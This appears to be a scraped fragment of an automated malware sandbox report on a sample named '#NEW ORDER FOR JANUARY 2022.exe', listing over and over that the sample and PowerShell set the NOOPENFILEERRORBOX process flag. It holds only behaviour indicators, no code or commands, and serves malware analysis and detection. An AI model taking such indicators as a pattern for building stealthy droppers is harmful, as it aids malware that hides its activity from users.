                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\#NEW ORDER FOR JANUARY 2022.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
